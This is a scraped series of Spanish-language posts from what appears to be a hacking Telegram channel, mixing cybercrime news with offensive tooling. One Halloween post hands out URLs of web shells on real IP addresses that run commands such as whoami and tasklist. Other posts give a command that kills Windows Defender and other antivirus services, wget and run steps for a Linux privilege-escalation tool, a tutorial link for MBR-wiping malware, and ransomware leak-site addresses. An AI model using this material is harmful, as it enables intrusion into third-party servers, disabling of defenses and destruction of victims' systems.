https://www.elconfidencial.com/empleo/2025-10-28/drones-hackers-virus-informaticos-busca-talento-joven_4236824/
#articulo #españa #hackers
#articulo #españa #hackers
elconfidencial.com
Drones, hackers, virus informáticos... Defensa busca talento joven para la guerra cibernética
La demanda de profesionales en este sector supera la oferta este año. En nuestro país, se requieren ya casi 100.000 profesionales para cubrir la demanda de talento, lo que significa una subida del 20% en relación con 2024
🔥8
Media is too big
VIEW IN TELEGRAM
Autoridades rusas arresta a 3 desarrolladores del Malware Meduza Stealer 🇷🇺🚨
En un operativo sorpresa la policía rusa a interrumpidos en domicilios de 3 miembros clave del grupo de desarrolladores del Stealer Meduza, según medios locales los arrestados son jóvenes expertos en IT y son los encargados de crear y distribuir el Malware por distintos foros y canales de Telegram.
Las detenciones de Hackers rusos en territorio ruso es muy rara ya que este pais es considerado un refugio para los piratas informáticos, esta detención se debe a que el Malware Meduza fue utilizado para atacar a una organización de una region rusa.
De ser declarados culpables los los 3 detenidos pueden pasar hasta 4 años en prisión.
FUENTE:
https://news.1rj.ru/str/IrinaVolk_MVD/5661
#rusia #malware #busted #arrestado #hacker #meduza #stealer
En un operativo sorpresa la policía rusa a interrumpidos en domicilios de 3 miembros clave del grupo de desarrolladores del Stealer Meduza, según medios locales los arrestados son jóvenes expertos en IT y son los encargados de crear y distribuir el Malware por distintos foros y canales de Telegram.
Las detenciones de Hackers rusos en territorio ruso es muy rara ya que este pais es considerado un refugio para los piratas informáticos, esta detención se debe a que el Malware Meduza fue utilizado para atacar a una organización de una region rusa.
De ser declarados culpables los los 3 detenidos pueden pasar hasta 4 años en prisión.
FUENTE:
https://news.1rj.ru/str/IrinaVolk_MVD/5661
#rusia #malware #busted #arrestado #hacker #meduza #stealer
😱7🔥4
/}
_,---~-LJ,-~-._
,-^ ' ' ' ^:,
: . ' ' :
: /| . /\ ' :
: . //| // \ ' :
: `~` /| `^~` ' ;
: ' //| ' :
: \-_ `~` , ' :
; . \.\_,--,_;^/ , :
: ^-_!^!__/^ , :
:, , . , : -HAPPY HALLOWEEN-
^--_____ . ;` 2025
`^''----`
🎃COMO YA ES TRADICIONAL EN FSEC CADA HALLOWEEN SE REGALA A LOS
FIELES SEGUIDORES ALGUNOS DULCES 🍬 🍭
http://181.13.175.66:50000/irj/bvpnqvnv.jsp?cmd=tasklist
http://179.50.23.109:50000/irj/ygqlsxad.jsp?cmd=tasklist
http://201.217.223.147:50000/irj/ndrwodyt.jsp?cmd=whoami (Linux)
http://186.147.143.210:50000/irj/liqwsjss.jsp?cmd=arp%20-a
https://179.50.81.123/irj/anlrqipw.jsp?cmd=dir
https://186.147.143.203/irj/nhnrxkfs.jsp
https://200.3.166.67//irj/mqreovyt.jsp?cmd=ls (linux)
https://200.85.234.131/irj/vwcsmtgf.jsp?cmd=ls (Linux)
https://200.85.234.133/irj/jdbueorq.jsp (Linux)
http://190.96.113.62:50000/irj/ldcbainy.jsp?cmd=ls%20/tmp (Linux)
http://200.80.201.170:50000/irj/cqgbtqoy.jsp?cmd=whoami (Linux)
💀¡HAPPY HALLOWEEN HAXXORS!🕷
🎃17🔥6😁3❤2😱2👻1🦄1
Según informes recientes cibercriminales rusos se encuentran usando amplimamente el C2 de codigo abierto AdaptixC2. 🇷🇺
Segun un informe de la empresa Silent Push, el submundo cibercriminal ruso se encuentra migrando de Cobalt Strike a AdaptixC2, afiliados de Akira Ransomware han añadido a Adaptix a su arsenal de herramientas.
También se ha observado que el fundador y desarrollador principal del proyecto es de origen ruso y opera un canal en Telegram en el cual tiene una comunidad muy activa en donde sugieren nuevas mejoras y realizan seguimientos de nuevas implementaciones del proyecto Adaptix, si bien no sea llegado a confirmar que el fundador del proyecto llamado RalfHacker tenga vínculos cercanos con cibercriminales se sabe que ha estado metido en el submundo cibercriminal desde hace tiempo.
FUENTE:
https://www.silentpush.com/blog/adaptix-c2/
https://thehackernews.com/2025/10/russian-ransomware-gangs-weaponize-open.html
Segun un informe de la empresa Silent Push, el submundo cibercriminal ruso se encuentra migrando de Cobalt Strike a AdaptixC2, afiliados de Akira Ransomware han añadido a Adaptix a su arsenal de herramientas.
También se ha observado que el fundador y desarrollador principal del proyecto es de origen ruso y opera un canal en Telegram en el cual tiene una comunidad muy activa en donde sugieren nuevas mejoras y realizan seguimientos de nuevas implementaciones del proyecto Adaptix, si bien no sea llegado a confirmar que el fundador del proyecto llamado RalfHacker tenga vínculos cercanos con cibercriminales se sabe que ha estado metido en el submundo cibercriminal desde hace tiempo.
FUENTE:
https://www.silentpush.com/blog/adaptix-c2/
https://thehackernews.com/2025/10/russian-ransomware-gangs-weaponize-open.html
❤5👍1
Usando herramienta legitima para remover Software antivirus y Window Defender 🛡👾
Para remover el Software Antivirus vamos a usar una herramienta de Kaspersky llamada TDSSKiller usado para remover Malware del sistema, pero en esta ocasión sera usado para remover el Window defender de nuestro sistema.
🎯 Nombres de servicios a matar:
🎯 Usando herramienta:
Descarga de herramienta:
http://web.archive.org/web/20230606061811/https://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe
#maldev #windef #manual
Para remover el Software Antivirus vamos a usar una herramienta de Kaspersky llamada TDSSKiller usado para remover Malware del sistema, pero en esta ocasión sera usado para remover el Window defender de nuestro sistema.
🎯 Nombres de servicios a matar:
Windows Defender - windefend
Malwarebytes - MBAMService
Kaspersky - AVP21.3
🎯 Usando herramienta:
TDSSKiller.exe -accepteula -silent -dcsvc <nombre servicio>
Descarga de herramienta:
http://web.archive.org/web/20230606061811/https://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe
#maldev #windef #manual
❤14
WARLOCK Ransomware 🔐
http://warlockhga5iw3t54ps5iytlilf7hlvxy7kwrkidspn4qoh64s4vsuyd.onion/
#ransomware #warlock #onion
http://warlockhga5iw3t54ps5iytlilf7hlvxy7kwrkidspn4qoh64s4vsuyd.onion/
#ransomware #warlock #onion
🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
TRAITOR | automatización para la escalada de privilegios en Linux. 💣🐧
Traitor es una herramienta que automatiza la escalada de privilegios de manera rapida y usando Exploits y configuraciones vulnerables del sistema victima.
🟥 USO:
Descarga binario desde github
🟥 Exploitacion de manera automática
https://github.com/liamg/traitor/
#github #exploit #prives #linux
Traitor es una herramienta que automatiza la escalada de privilegios de manera rapida y usando Exploits y configuraciones vulnerables del sistema victima.
🟥 USO:
Descarga binario desde github
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64 -o traitor
🟥 Exploitacion de manera automática
traitor -a
https://github.com/liamg/traitor/
#github #exploit #prives #linux
🔥11👎2❤1
Busca información de usuarios del extinto foro Breachforums. 🔍
https://bf.based.re/
#osint #breachforums
https://bf.based.re/
#osint #breachforums
😱5👎1
MalDev - Master Boot Record Delete 💿☠️
Que tal Haxxors, hoy vamos ha realizar un pequeño Malware para ataques disruptivos el cual lograra afectar la disponibilidad del sistema victima. Vamos a programar nuestro MBR Delete, un pequeño Malware el cual borra el Master Boot Record (MBR) de nuestro disco dejando a nuestra victima sin poder arrancar su sistema operativo.
https://gitlab.com/fsec-vaul/master-boot-record-delete
#maldev #gitlab #tutorial
Que tal Haxxors, hoy vamos ha realizar un pequeño Malware para ataques disruptivos el cual lograra afectar la disponibilidad del sistema victima. Vamos a programar nuestro MBR Delete, un pequeño Malware el cual borra el Master Boot Record (MBR) de nuestro disco dejando a nuestra victima sin poder arrancar su sistema operativo.
https://gitlab.com/fsec-vaul/master-boot-record-delete
#maldev #gitlab #tutorial
❤9
Una nueva pandilla de Ransomware entra en escena 🔐
Kazu Ransomware se encuentra corriendo en la Darknet, al parecer con un solo miembro proveniente de foros como DarkForums y exploit.in, sea observado que en los últimos meses el usuario que opera bajo el nombre Kazu se encontro vendiendo datos de gobiernos y empresas en distintos foros.
Recientemente el usuario estreno su sitio Kazu Ransomware el cual actualmente cuenta con 3 victimas 2 de esas victimas son servidores del gobierno colombiano:
- Defensoría del Pueblo de Colombia
- Comisión Nacional del Servicio Civil
http://6czlbd2jfiy6765fbnbnzuwuqocg57ebvp3tbm35kib425k4qnmiiiqd.onion/ransom.html
#ransomware #kazu #onion
Kazu Ransomware se encuentra corriendo en la Darknet, al parecer con un solo miembro proveniente de foros como DarkForums y exploit.in, sea observado que en los últimos meses el usuario que opera bajo el nombre Kazu se encontro vendiendo datos de gobiernos y empresas en distintos foros.
Recientemente el usuario estreno su sitio Kazu Ransomware el cual actualmente cuenta con 3 victimas 2 de esas victimas son servidores del gobierno colombiano:
- Defensoría del Pueblo de Colombia
- Comisión Nacional del Servicio Civil
http://6czlbd2jfiy6765fbnbnzuwuqocg57ebvp3tbm35kib425k4qnmiiiqd.onion/ransom.html
#ransomware #kazu #onion
😁4
Media is too big
VIEW IN TELEGRAM
🚨 La Operacion End Game continua: 1025 servidores desmantelados
Entre el 10 y el 13 de noviembre de 2025, la última fase de la Operación Endgame se coordinó desde la sede de Europol en La Haya. Las acciones se centraron en uno de los mayores ladrones de información, Rhadamanthys, el troyano de acceso remoto VenomRAT y la red de bots Elysium, todos ellos con un papel clave en la ciberdelincuencia internacional. Las autoridades desmantelaron estos tres grandes facilitadores de la ciberdelincuencia.
El principal sospechoso de VenomRAT fue detenido en Grecia el 3 de noviembre de 2025. La infraestructura desmantelada durante los días de la operación era responsable de infectar con malware a cientos de miles de víctimas en todo el mundo.
http://venomlicense.com/
https://operation-endgame.com/
https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down
#opEndGame #europol #venomrat
Entre el 10 y el 13 de noviembre de 2025, la última fase de la Operación Endgame se coordinó desde la sede de Europol en La Haya. Las acciones se centraron en uno de los mayores ladrones de información, Rhadamanthys, el troyano de acceso remoto VenomRAT y la red de bots Elysium, todos ellos con un papel clave en la ciberdelincuencia internacional. Las autoridades desmantelaron estos tres grandes facilitadores de la ciberdelincuencia.
El principal sospechoso de VenomRAT fue detenido en Grecia el 3 de noviembre de 2025. La infraestructura desmantelada durante los días de la operación era responsable de infectar con malware a cientos de miles de víctimas en todo el mundo.
http://venomlicense.com/
https://operation-endgame.com/
https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down
#opEndGame #europol #venomrat
🔥3
Hacker ruso arrestado en Tailandia, presumiblemente parte de GRU de Rusia. 🇷🇺🚨
Un pirata informático fue arrestado en Tailandia a petición de EEUU, varios titulares de prensa catalogaron al Hacker como un "Hacker mundialmente famosos", se presume que se trata de ALEKSEY VIKTOROVICH LUKASHEV un alto oficial de la Agencia de inteligencia militar rusa (GRU).
En el 2018 el FBI lanzo un aviso de búsqueda en contra de 12 miembros de GRUB por interferir en las Elecciones del 2016, Aleksey figura en la lista como un militar de alto rango que dirige la Unidad 26165 o también conocido como Fancy Bear.
Las autoridades junto con agentes del FBI lograron incautar ordenadores y billeteras de Crypto de Aleksey, actualmente Aleksey se encuentra aguardando su extradición a los EEUU.
https://web.archive.org/web/20250215143547/https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev/aleksey-viktorovich-lukashev-8-5x11.pdf
#rusia #fancybear #hacker #busted #fbi
Un pirata informático fue arrestado en Tailandia a petición de EEUU, varios titulares de prensa catalogaron al Hacker como un "Hacker mundialmente famosos", se presume que se trata de ALEKSEY VIKTOROVICH LUKASHEV un alto oficial de la Agencia de inteligencia militar rusa (GRU).
En el 2018 el FBI lanzo un aviso de búsqueda en contra de 12 miembros de GRUB por interferir en las Elecciones del 2016, Aleksey figura en la lista como un militar de alto rango que dirige la Unidad 26165 o también conocido como Fancy Bear.
Las autoridades junto con agentes del FBI lograron incautar ordenadores y billeteras de Crypto de Aleksey, actualmente Aleksey se encuentra aguardando su extradición a los EEUU.
https://web.archive.org/web/20250215143547/https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev/aleksey-viktorovich-lukashev-8-5x11.pdf
#rusia #fancybear #hacker #busted #fbi
🔥8😨1
Media is too big
VIEW IN TELEGRAM
Como parte de la operación internacional "EndGame" autoridades holandesas confiscaron Hardware de Crazyrdp Bulletproof Hosting. 🇳🇱🚨
CrazyRDP fue un servicio de Hosting a prueba de balas ampliamente usado para montar infraestructura de Ransomware, Stealer y Botnets.
Segun las autoridades CrazyRDP operaba como un sofisticado proveedor de alojamiento a prueba de balas que prestaba servicios **comunidad internacional de ciberdelincuencia** con infraestructura diseñada específicamente para resistir las acciones policiales.
https://breached.company/operation-endgame-continues-crazyrdp-bulletproof-hoster-dismantled-as-dutch-police-seize-thousands-of-servers-in-coordinated-cybercrime-crackdown/
#endgame #crazyrdp #busted
CrazyRDP fue un servicio de Hosting a prueba de balas ampliamente usado para montar infraestructura de Ransomware, Stealer y Botnets.
Segun las autoridades CrazyRDP operaba como un sofisticado proveedor de alojamiento a prueba de balas que prestaba servicios **comunidad internacional de ciberdelincuencia** con infraestructura diseñada específicamente para resistir las acciones policiales.
https://breached.company/operation-endgame-continues-crazyrdp-bulletproof-hoster-dismantled-as-dutch-police-seize-thousands-of-servers-in-coordinated-cybercrime-crackdown/
#endgame #crazyrdp #busted
🔥7😢4❤1👏1
🛡 GoDefender 🛡
Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie, Anti Sandbox, VM Detect package. Windows ONLY.
https://github.com/EvilBytecode/GoDefender
#maldev #bypassav #github
Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie, Anti Sandbox, VM Detect package. Windows ONLY.
https://github.com/EvilBytecode/GoDefender
#maldev #bypassav #github
GitHub
GitHub - EvilBytecode/GoDefender: Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie…
Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie, Anti Sandbox, VM Detect package. Windows ONLY. - EvilBytecode/GoDefender
👏7
Prueba de concepto de CVE-2025-9491 utilizando caracteres invisibles en los argumentos de un archivo de acceso directo de Windows (.lnk)
https://github.com/Amperclock/CVE-2025-9491_POC
#github #poc #exploit #cve
https://github.com/Amperclock/CVE-2025-9491_POC
#github #poc #exploit #cve
GitHub
GitHub - Amperclock/CVE-2025-9491_POC: Proof-of-Concept of the CVE-2025-9491 using invisible characters in the arguments of a Windows…
Proof-of-Concept of the CVE-2025-9491 using invisible characters in the arguments of a Windows shortcut file (.lnk) - Amperclock/CVE-2025-9491_POC
❤6
Ryūjin Protector 🛡
Ryūjin Protector is an open-source Bin2Bin obfuscation, protection, and DRM tool for Windows PE binaries targeting the Intel x64 architecture (x86_64 only).
https://github.com/keowu/Ryujin
#bypassav #maldev #github
Ryūjin Protector is an open-source Bin2Bin obfuscation, protection, and DRM tool for Windows PE binaries targeting the Intel x64 architecture (x86_64 only).
https://github.com/keowu/Ryujin
#bypassav #maldev #github
🔥9